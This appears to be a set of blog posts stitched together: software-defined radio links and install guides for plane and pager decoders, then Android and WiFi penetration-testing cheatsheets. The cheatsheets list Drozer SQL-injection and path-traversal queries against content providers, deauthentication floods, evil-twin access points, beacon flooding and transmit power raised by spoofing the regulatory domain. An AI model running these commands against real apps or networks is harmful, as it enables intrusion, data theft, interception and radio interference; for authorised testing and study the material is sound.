http://randomkeystrokes.com/2016/07/02/installing-dump1090-adsb-decoder-tool-on-ubuntu-16-04-lts/

Looking at Ships
https://www.hak5.org/episodes/hak5-1610

Looking at Pagers
Introduction to SDR workshop slides show how to get going with multimon-ng for pagers and dump1090 for airplanes on the Linux command line.
http://randomkeystrokes.com/2016/07/01/installing-multimon-ng-pager-decoder-tool-on-ubuntu-16-04-lts/

Introduction to Radio Theory
https://www.hak5.org/episodes/hak5-1604
https://www.hak5.org/episodes/hak5-1605
https://www.hak5.org/episodes/hak5-1607
https://www.hak5.org/episodes/hak5-1608

GNU Radio Introduction
http://gnuradio.org/redmine/projects/gnuradio/wiki/TutorialsCoreConcepts
http://www.trondeau.com/gr-tutorial/
http://files.ettus.com/tutorials/labs/Lab_1-5.pdf
https://www.youtube.com/watch?v=_hGNT1w-jig
https://www.youtube.com/watch?v=N9SLAnGlGQs
https://www.hak5.org/episodes/hak5-1601

Videos
Michael Ossmann’s SDR videos: http://greatscottgadgets.com/sdr/
Cyberspectrum Bay Area record their talks and post to YouTube.
Cyberspectrum Melbourne also record and post talks to YouTube.

Books
The Hobbyist’s Guide to the RTL-SDR: Really Cheap Software Defined Radio by Carl Laufer
Radio Theory Handbook. Beginner to Advanced by Mr Ronald Bertrand
GNU Radio’s reading list: http://gnuradio.org/redmine/projects/gnuradio/wiki/SuggestedReading

News
https://www.reddit.com/r/sdr
https://www.reddit.com/r/rtlsdr
https://www.reddit.com/r/hackrf
https://www.reddit.com/r/amateurradio

IRC
Join in and ask questions on IRC:
##rtlsdr on freenode
#gnuradio on freenode
#hak5 on freenode
#airspy on freenode
#bladerf on freenode
#hackrf on freenode
##hamradio on freenode
#sdrsig on freenode
#satnogs on freenode

Meetups
– Check out your local area, there may be a SDR meetup group near you!
– In Melbourne, we have Cyberspectrum Melbourne which meets every month.
– In Tasmania, there is also the SDRSIG group.
– In the Bay Area – USA, there is the excellent Cyberspectrum Bay Area.
– A lot of conferences are also running SDR workshops and introductions now too, e.g. in Australia there is Playpuscon in Sydney, Ruxcon in Melbourne and BSides in Canberra. So check out your local conferences too!

Cyberspectrum Melbourne Meetup Details
Come along to our meetup group in Melbourne or join our slack channel:
– Twitter: @sdr_melbourne
– Email: sdr/dot/melbourne@gmail.com
– Slack: sdr-melbourne.slack.com (email for an invite)
– Meetup: http://www.meetup.com/Cyberspectrum-Melbourne
– Github: https://github.com/sdr-melbourne/
– YouTube: https://www.youtube.com/channel/UCLBloqxOXEj4fH7sTT5YULA

Installing dump1090 ADSB Decoder Tool on Ubuntu (16.04 LTS)

Installing dump1090 for the RTLSDR dongle

Download dump1090
Download dump1090 zip file from github:
https://github.com/antirez/dump1090

Install Prerequisites
$ sudo apt-get install librtlsdr0 librtlsdr-dev

Install dump1090
$ cd dump1090-master
$ make

Using dump1090
1. Start dump1090 in interactive mode with the plane plotting option
$ ./dump1090 --interactive --net

2. Plane details will appear in this terminal window

3. Open your browser to see the planes plotted:
http://localhost:8080

Fixing Install Errors
Note: having librtlsdr-dev installed fixes this error:

user@host:~/dump1090-master$ make
Package librtlsdr was not found in the pkg-config search path.
Perhaps you should add the directory containing `librtlsdr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘librtlsdr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:46:21: fatal error: rtl-sdr.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Installing dump1090 fork for more device support (RTLSDR/HackRF/Airspy/SDRplay)

Download dump1090_sdrplus
Download dump1090_sdrplus zip file from github:
https://github.com/itemir/dump1090_sdrplus

Install Prerequisites
$ sudo apt-get install librtlsdr0 librtlsdr-dev
$ sudo apt-get install libhackrf0 libhackrf-dev
$ sudo apt-get install libairspy0 libairspy-dev
$ sudo apt-get install libsoxr0 libsoxr-dev

Next, download SDRPlay libraries from:
http://www.sdrplay.com/linuxdl.php

Install SDRPlay:
user@host:~$ chmod 755 SDRplay_RSP_MiricsAPI-1.9.4.run
user@host:~$ ./SDRplay_RSP_MiricsAPI-1.9.4.run
Verifying archive integrity… All good.
Uncompressing SDRplay Mirics API Install Package V1.9.4 100%
Installing SDRplay RSP Mirics API library…
Architecture: x86_64
API Version: 1.8.1
Remove old libraries…
[sudo] password for user:
Install /usr/local/lib/libmirsdrapi-rsp.so
Remove old header files…
Install /usr/local/include/mirsdrapi-rsp.h
Udev rules directory found, adding rules…
Libusb found, continuing…
Installing SoapySDRPlay…
Installing SoapySDR…
Finished.
$ sudo ldconfig

Install dump1090_sdrplus
$ cd dump1090_sdrplus-master
$ make

Using dump1090_sdrplus
1. Start dump1090 in interactive mode with the plane plotting option
$ ./dump1090 --interactive --net

2. Plane details will appear in this terminal window

3. Open your browser to see the plans plotted:
http://localhost:8080

Fixing Install Errors
Note: having librtlsdr-dev installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
Package librtlsdr was not found in the pkg-config search path.
Perhaps you should add the directory containing `librtlsdr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘librtlsdr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:46:21: fatal error: rtl-sdr.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having libhackrf0 & libhackrf-dev installed fixes this error:

user@host:~/tools/dump1090_sdrplus-master$ make
Package libhackrf was not found in the pkg-config search path.
Perhaps you should add the directory containing `libhackrf.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘libhackrf’ found
Package libairspy was not found in the pkg-config search path.
Perhaps you should add the directory containing `libairspy.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘libairspy’ found
Package soxr was not found in the pkg-config search path.
Perhaps you should add the directory containing `soxr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘soxr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:51:30: fatal error: libhackrf/hackrf.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having libairspy0 & libairspy-dev installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
Package libairspy was not found in the pkg-config search path.
Perhaps you should add the directory containing `libairspy.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘libairspy’ found
Package soxr was not found in the pkg-config search path.
Perhaps you should add the directory containing `soxr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘soxr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:52:30: fatal error: libairspy/airspy.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having libsoxr0 & libsoxr-dev installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
Package soxr was not found in the pkg-config search path.
Perhaps you should add the directory containing `soxr.pc’
to the PKG_CONFIG_PATH environment variable
No package ‘soxr’ found
cc -O2 -g -Wall -W -c dump1090.c
dump1090.c:53:27: fatal error: mirsdrapi-rsp.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: having SDRPlay libraries installed fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
cc -O2 -g -Wall -W -I/usr/include/ -I/usr/include/libusb-1.0 -I/usr/include/ -I/usr/include/libusb-1.0 -c dump1090.c
dump1090.c:53:27: fatal error: mirsdrapi-rsp.h: No such file or directory
compilation terminated.
Makefile:9: recipe for target ‘dump1090.o’ failed
make: *** [dump1090.o] Error 1

Note: running ldconfig fixes this error:

user@host:~/tools/dump1090-sdrplus-master$ make
./dump1090: error while loading shared libraries: libmirsdrapi-rsp.so: cannot open shared object file: No such file or directory

Installing multimon-ng Pager Decoder Tool on Ubuntu (16.04 LTS)

Download multimon-ng
Download multimon-ng zip file from github:
https://github.com/EliasOenal/multimon-ng

Note: Ubuntu has a “multimon” tool in the apt repos but using the github version here.
There are many ways to pipe the data into “multimon-ng”, but will use the pulse audio method here.

Install Prerequisites
$ sudo apt-get install pavucontrol
$ sudo apt-get install libpulse-dev

Install multimon-ng
$ cd multimon-ng-master
$ mkdir build
$ cd build
$ qmake ../multimon-ng.pro
$ make
$ sudo make install

Using multimon-ng with pulseaudio
1. Start gqrx
$ gqrx
Use gqrx to tune to a pager frequency (e.g. 148Mhz region for Australia)
Set the filter width to: “Wide”
Set the filter shape to: “Normal”
Set the gqrx mode to “Narrow FM”

3. Configure pavucontrol
$ pavucontrol
Set configuration tab: “Analogue Stereo Output”

3. Use pulseaudio to pipe the audio from gqrx to multimon-ng
$ padsp multimon-ng -a POCSAG512 -a POCSAG1200 -a POCSAG2400 -f alpha

Note: set the pager demod options for your region
e.g. POCSAG for Australia

As you tune to different pager frequencies in gqrx, you will see the decoded messages appear in the multimon-ng terminal.

Fixing Install Errors
Note: having libpulse-dev installed fixes this error:

user@host:~/multimon-ng-master/build$ make
gcc -c -m64 -pipe -std=gnu99 -g -O2 -Wall -W -fPIC -DMAX_VERBOSE_LEVEL=3 -DPULSE_AUDIO -DCHARSET_UTF8 -I../../multimon-ng-master -I. -I/usr/lib/x86_64-linux-gnu/qt5/mkspecs/linux-g++-64 -o unixinput.o ../unixinput.c
../unixinput.c:45:26: fatal error: pulse/simple.h: No such file or directory
compilation terminated.
Makefile:391: recipe for target ‘unixinput.o’ failed
make: *** [unixinput.o] Error 1

Android Pentesting Command Cheatsheet

Useful tools
Android SDK
Android Studio
GenyMotion emulator
BusyBox
apktool
dex2jar
enjarify
jd-gui
MWR’s Drozer testing framework
Fino

Useful Linux file paths
android/adt-bundle-linux-ver-number/sdk/platform-tools: adb tool
android/adt-bundle-linux-ver-number/sdk/tools: emulator, android tools
~/.android/avd/<emulator-device-name>.avd/: emulator config files

Useful Windows file paths
C:\Users\username\AppData\Local\Android\sdk

Useful Android paths
/data/app: location of app on android device
/data/data/[packagename]/*: app data files
/data/Dalvik-cache: Classes.dex for all installed apps

Useful configuration settings
Enable hardware keyboard in emulator:
Add: hw.keyboard=yes to the config file:
~/.android/avd/<emulator-device-name>.avd/config.ini

Install test environment
Install Android SDR only
https://developer.android.com/studio/releases/platforms.html
OR
Install Android Studio
https://developer.android.com
OR
Install GenyMotion
https://www.genymotion.com

Install APIs
$ android
and choose API version to install with gui

List available Android targets
$ android list targets

Create an Android image for a target
$ android create avd -n test -t 3
$ android create avd -n test -t 3 –abi default/x86

Start emulator
Start the emulator for the created image @test:
emulator @test
$ adb shell

Install BusyBox
$ adb push busybox /data/local
$ adb shell
$ su
# mount -o remount,rw -t yaffs2 /dev/block/mtdblock3 /system
# mkdir /system/xbin
# cat /data/local/busybox > /system/xbin/busybox
# chmod 755 /system/xbin/busybox
# busybox --install /system/xbin
# mount -o ro,remount -t yaffs2 /dev/block/mtdblock3 /system
# sync
# reboot

Install Burp cert on emulator
Create an sdcard for the emulator:
$ mksdcard -l pisd 1G /tmp/sdcard

Launch emulator with -sdcard option:
$ emulator-x86 -sdcard /tmp/sdcard -avd test -qemu -m 1024 -enable-kvm -http-proxy "http://192.168.1.2:8080"

Get Portswigger cert from visiting a page in browser, export and save as Portswigger.crt
Note: must have .crt extension for android to recognise it on sdcard

Copy the cert onto the device:
$ adb push Portswigger.crt /mnt/sdcard
Next, go to “Settings” and install from sdcard

Installing Drozer
Install drozer app on test device and run it.
From your laptop, connect to the app:
$ adb forward tcp:31415 tcp:31415
$ drozer console connect
$ drozer console --server 10.0.2.15:31415 connect

Copy an APK off device
Installed APKs are located in /data/app on the device
$ adb pull /data/app/AppName-1.apk .

Extracting Java code from an APK
Extract the APK using APKTool. Run: apktool d AppName.apk
Extract the classes.dex file found in the APK file. Run: jar xvf classes.dex
Extract the classes from classes.dex file. Run: dex2jar classes.dex
Extract the classes.dex.dex2jar.jar. Run: jar xvf classes.dex.dex2jar.jar
Browse Java code: Open the extracted jar file in jd-gui

Check the manifest file
First, unpack the apk using unzip
$ unzip AppName.apk
$ axmlprinter AndroidManifest.xml

Check package information
Using Drozer:
dz> run app.package.list
dz> run app.package.attacksurface com.targetpackage
dz> run app.provider.info -a com.targetpackage

Check for the debug flag
Using Drozer:
dz> run app.package.debuggable
OR
Check manifest file.

Check for SQL injection
Using Drozer:
dz> run scanner.provider.injection -a com.targetpackage

Check for path traversal
Using Drozer:
dz> run scanner.provider.traversal -a com.targetpackage

Check the Content Providers
Content providers provide access to structured data.
Can be affected by: SQLi, directory traversal

Useful Drozer commands for working with content providers:
dz> run app.provider.info -a com.targetpackage
dz> run app.provider.finduri com.targetpackage
dz> run scanner.provider.finduris -a com.targetpackage
dz> run scanner.provider.traversal -a com.targetpackage
dz> run scanner.provider.injection -a com.targetpackage
dz> run app.provider.query content://com.targetpackage...
dz> run app.provider.query content://com.targetpackage... --vertical --selection "'"
dz> run app.provider.query content://com.targetpackage... --projection "* FROM SQLITE_MASTER WHERE type='table';--"
dz> run app.provider.query content://com.targetpackage... --projection "* FROM Key;--"
dz> run app.provider.read content://com.targetpackage...
dz> run app.provider.read content://com.targetpackage../etc/hosts
dz> run app.provider.download content://com.targetpackage../data/data/com.targetpackage]/databases/database.db

Check the Activities
Activities provide user facing components.
Can be affected by UI redressing attacks e.g. tap jacking etc

Useful Drozer commands for working with activities:
dz> run app.activity.info -a com.targetpackage
dz> run app.activity.start --component com.targetpackage com.targetpackage.ActivityName

Check the Services
Useful Drozer commands for working with services:
dz> run app.service.info -a com.targetpackage
dz> run app.service.send com.targetpackage com.targetpackage.ServiceName

Check the Intents
Intents can be implicit or explicit.
Check Manifest file for public intents, e.g.
<receiver android:name="my.special.receiver">
<intent-filter>
<action android:name="my.intent.action" />
</intent-filter>
</receiver>

Instead, intents should use the exported flag or made private e.g.
<receiver android:name="my.special.receiver"
android:exported=false>
...
</receiver>

OR
<receiver android:name="my.special.receiver"
android:exported=false>
android:permission="my.own.permission"
...
</receiver>

Check the Broadcast Receivers
Broadcast receivers handle implicit intent messages or system wide events

Useful Drozer commands for working with broadcast receivers:
dz> run app.broadcast.info -a com.PackageName.AppName
dz> run app.broadcast.send --action [name of action from manifest file] --component com.PackageName.AppName com.PackageName.AppName.push.GCMPushReceiver
dz> run app.broadcast.send --action [name of action from manifest file] --component com.PackageName.AppName.push.GCMPushReceiver --extra string paramName paramValue --extra sting paramName2 paramValue2

Check for Sticky broadcasts
<uses-permission android:name="android.permission.BROADCAST_STICKY"/>

Check the files stored on the device
Grep for:
http, https, ://, user, pass, hmac, login

Check for insecure data storage on the device
Perform a search for files relating to package name:
root@android:/ # find / -name com.PackageName -print

Check the SD Card:
/mnt/sdcard
/mnt/sdcard/Android/data/com.PackageName

Check the data directory:
/data/data/com.PackageName

Check the database files on the device:
sqlite> select * from StoredProperties;
429482317|OPEN_SESAME|pTpkKAqfa9ly2oLqmivPIMKZDhTVlPOMLC9Ogi3c8Z0fkXL+H8u66ytJ0aFh+QY4N4rX9Iq5qVuKnCon0a+lirekLJD3/6uoh/e5vaNptxI=

Save the database files off the device:
/data/data/packagename
cp name.db /mnt/sdcard
$ adb pull /mnt/sdcard/name.db . (otherwise won’t have perms to copy)

Check the log files:
logcat -b events
/data/anr
/data/dontpanic
/data/tombstones
dmesg

Check the device memory
Check memory stats:
$ adb shell dumpsys meminfo > mem.txt
$ adb shell dumpsys meminfo 'com.PackageName'

Dump the memory:
$ adb shell dumpsys > mem.txt
$ adb shell dumpstate > mem.txt (can show params passed to intents etc.)

Checking memory and logcat together:
$ adb shell bugreport > bugreport.txt

Check for bad code patterns
http://domain.com/api/save.php?t=" + paramString1 + "&u=" + paramString2);
reflection
etc.

Check for WebViews
Search the decompiled folder for:

addJavascriptInterface
grep -r -n -i --include=*.java addJavascriptInterface *
grep -r -i --include=*.java \@JavascriptInterface *

shouldOverrideUrlLoading
grep -r -n -i --include=*.java shouldOverrideUrlLoading *

Use Drozer module:
run ex.scanner.jsifenum -a com.targetpackage

Check the transport security
Use the emulator to dump traffic to a pcap flle with the option:
-tcpdump

Use the emulator to proxy traffic with the option:
-http-proxy

Intercept with burp.

Wifi Pentesting Command Cheatsheet

Find out which modes your card supports
airmon-ng (find phy#)
iw phy phy1 info | grep -A8 modes (grep 8 lines past “modes”)

Setting a MAC Address
ifconfig wlan3 down
ifconfig wlan3 hw ether c0:ff:ee:c0:ff:ee
ifconfig wlan3 up
OR
macchanger -r wlan3 (provides a random address every time)

Monitor Mode
ifconfig wlan3 up
airmon-ng start wlan3

Looking for SSIDs
dev wlan3 scan passive | grep SSID

Looking at client traffic to an AP
wireshark filter: wlan.addr==CC:00:FF:EE:EE:EE and not wlan.fc.subtype == 0x08 (MAC of AP & filter out beacon frames)
wlan.addr ==CC:00:FF:EE:EE:EE and wlan.addr == DD:EE:AA:DD:BE:EF (filter on 2 client MAC addresses)

Looking for vendors
airodump-ng --manufacturer (newer versions of airodump support this)

Setting the Channel
ifconfig wlan3 down
iwconfig wlan3 channel 1 (get channel id of ssid from airodump)
iwconfig mon0 channel 1
then verify the “Frequency” value in iwconfig e.g. channel 1 = 2.412 GHz

Connecting to an Open AP
iwconfig wlan3 channel 1
iwconfig wlan3 mode managed
iwconfig wlan3 essid APName

De-authentication
iwconfig mon0 channel 1
aireplay-ng -0 10 -a CC:00:FF:EE:EE:EE -cDD:EE:AA:DD:BE:EF mon0
deauth -a access point -c client
OR
broadcast deauth packets on behalf of ESSID 11:22:33:44:5 to deauth all clients
iwconfig mon0 channel 1
aireplay-ng --deauth 0 -a 11:22:33:44:55 mon0
OR
airodump-ng --output-format csv --write /root/dump.csv mon0
airdrop-ng -i mon0 -t /root/dump.csv-01.csv -r /root/droprules

Setting up an AP
bring up AP with same name as target (put on same channel as AP)
iwconfig wlan0 channel 1
iwconfig mon0 channel 1

use same BSSID as target AP & create AP on channel 1 (unless have 2 alfa cards, 1 for deauth and 1 for AP, need to use same channel as AP)
airbase-ng -a 11:22:33:44:55:66 -e APName mon0

setup deauth attack at same time
aireplay-ng --deuath 0 -a 00:11:22:33:44:55:66 mon0

Auditing EAP/PEAP Entreprise
crEAP
EAPeak

requires scapy-com:
apt-get remote python-scapy
hg clone https://bitbucket.org/secdev/scapy-com
cd scapy-com && python setup.py install

Using crEAP
python crEAP.py

Using EAPeak
eapeak -i wlan3 -s APName -l

Flooding beacon frames with fake ssid
mdk3 mon0 b -n newSSIDname

where:
b=beaconflood, -n=ssid name
floods all the channels with new SSID name

Increasing power of wifi card
e.g. for broadcasting beacons from outside, set to 1W (30dbm)
iw reg set BO
iwconfig wlan0 txpower 30
OR
ifconfig wlan0 down
iw reg set BO
ifconfig wlan0 up
iwconfig wlan0 channel 13
iwconfig wlan0 txpower 30

Tools for visualising
Airgraph

Useful subtype hex values
0x04 : requests
0x05 : responses
0x08 : beacon frame

Units
txpower is in dBm
dBm to Watt conversions

dBm Watts dBm Watts dBm Watts
0 1.0 mW 16 40 mW 32 1.6 W
1 1.3 mW 17 50 mW 33 2.0 W
2 1.6 mW 18 63 mW 34 2.5 W
3 2.0 mW 19 79 mW 35 3.2 W
4 2.5 mW 20 100 mW 36 4.0 W
5 3.2 mW 21 126 mW 37 5.0 W
6 4 mW 22 158 mW 38 6.3 W
7 5 mW 23 200 mW 39 8.0 W
8 6 mW 24 250 mW 40 10 W
9 8 mW 25 316 mW 41 13 W
10 10 mW 26 398 mW 42 16 W
11 13 mW 27 500 mW 43 20 W
12 16 mW 28 630 mW 44 25 W
13 20 mW 29 800 mW 45 32 W
14 25 mW 30 1.0 W 46 40 W
15 32 mW 31 1.3 W 47 50 W

ref: http://www.cpcstech.com/dbm-to-watt-conversion-information.htm